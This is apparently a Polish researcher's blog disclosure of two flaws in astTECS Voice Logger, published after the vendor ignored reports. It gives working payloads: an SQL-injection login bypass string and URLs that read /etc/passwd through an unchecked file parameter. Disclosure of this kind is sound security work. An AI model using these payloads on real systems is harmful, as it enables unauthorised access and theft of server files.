Voice Logger astTECS - bypass login & arbitrary file download
Dzisiaj, o błędach w Voice Logger firmy astTECS i o moim doświadczeniu w zgłoszeniu / w próbie zgłoszenia tej podatności. Usiłowałem i nie dałem rady. Próbowałem przez LiveChat na stronie firmy, próbowałem pisać maile do techniki. Nic, zero odzewu i zero zainteresowania ( no może oprócz Pani z LiveChata, która to skierowała mnie do techniki), a czekałem chyba z miesiąc z publikacją.
Pierwsza z opisywanych podatności to SQLi podczas logowania, taki sobie bypass login:
login: admin' or 1='1
password: admin
plik: manager_login.server.php
lina: 168
Drugi z błędów pozwala na pobranie dowolnego pliku z serwera (trzeba pamiętać o uprawnieniach httpd)
http://192.168.1.145/asttecs/records1.php?file=/etc/passwd
plik:records.php
linia: 2
http://192.168.1.145/asttecs/records.php?file=/etc/passwd
plik:records.php
linia: 2